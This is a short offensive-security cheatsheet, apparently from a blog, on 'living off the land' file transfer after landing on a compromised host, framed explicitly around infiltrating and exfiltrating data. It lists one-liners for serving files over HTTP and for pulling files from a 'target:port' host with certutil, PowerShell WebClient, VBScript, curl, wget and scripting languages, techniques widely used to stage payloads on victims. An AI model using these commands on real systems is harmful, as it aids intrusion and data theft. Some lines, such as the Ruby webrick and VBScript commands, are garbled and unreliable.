Organic HTTP File Transfer

Living off the land is essential when it comes to penetrating networks. The box that you landed on may be bare bones with only the default corporate software installed. Infiltrating and exfiltrating data is critical to mission success. This cheatsheet is not all inclusive, but should give you a good starting point for organic file transfer mechanisms.

HTTP Server One Liners

Lang/Cmd One Liner
Busybox busybox httpd -f -p
Go go get; serve -p
Ncat ncat –keep-open -l -p -c “printf ‘HTTP/1.1 200 OK\r\n\r\n’; cat ~/file_to_serve”
Node npm install -g node-static; static -p
Perl perl -MHTTP::Server::Brick -e ‘$s=HTTP::Server::Brick->new(port=>8000); $s->mount(“/”=>{path=>“.”}); $s->start’
PHP >= 5.4 php -S
Python 2 python -m SimpleHTTPServer
Python 3 python -m http.server
Python (Twisted) twistd -n web -p –path ./
Ruby ruby -rwebrick -e ‘ => 8000, :DocumentRoot => Dir.pwd).start’
Ruby 1.9.2+ ruby -run -ehttpd . -p8000

HTTP Get One Liners

Lang/Cmd One Liner
certutil certutil -urlcache -split -f http://target:port/file
curl curl http://target:port/file -o output
ncat printf “GET / HTTP/1.0\r\n\r\n” | nc target port | sed -e ‘1,/^\r/d’ > output
Node.js node -p “var http = require(‘http’); var fs = require(‘fs’); var file = fs.createWriteStream(‘output’); var request = http.get(‘http://target:port/', function(resp) { resp.pipe(file); });”
Perl perl -e ‘use LWP::Simple; getstore(“http://target:port", “output”);’
PHP php -r ‘$data = @file(“http://target:port"); $fh = fopen(“output”, “w”); fwrite($fh, $data[0]); fclose($fh);’
Powershell powershell.exe -Command “& {(New-Object Net.WebClient).DownloadFile(‘http://target/dest', ‘output’)}”
Python python -c ‘import urllib, sys; sys.stdout.write(urllib.urlopen(“http://target:port").read())' > output
Ruby ruby -e ‘require “net/http”; Net::HTTP.start(“target:port”) { |http| r = http.get(“/file”); open(“output”, “wb”) { |file| file.write(r.body) } }’
VBScript echo Set o=CreateObject^(“MSXML2.XMLHTTP”^):Set a=CreateObject^(“ADODB.Stream”^):Set f=Createobject^(“Scripting.FileSystemObject”^) “GET”, “http://target:port", 0:o.send^(^):If o.Status=200 Then >“%temp%.vbs” &echo a.Open:a.Type=1:a.Write o.ResponseBody:a.Position=0: >>“%temp%.vbs” &echo a.SaveToFile “.\output” >>“%temp%.vbs” &echo End if >>“%temp%.vbs” &cscript //B “%temp%.vbs” &del /F /Q “%temp%.vbs”
wget wget http://target:port/file -O output


comments powered by Disqus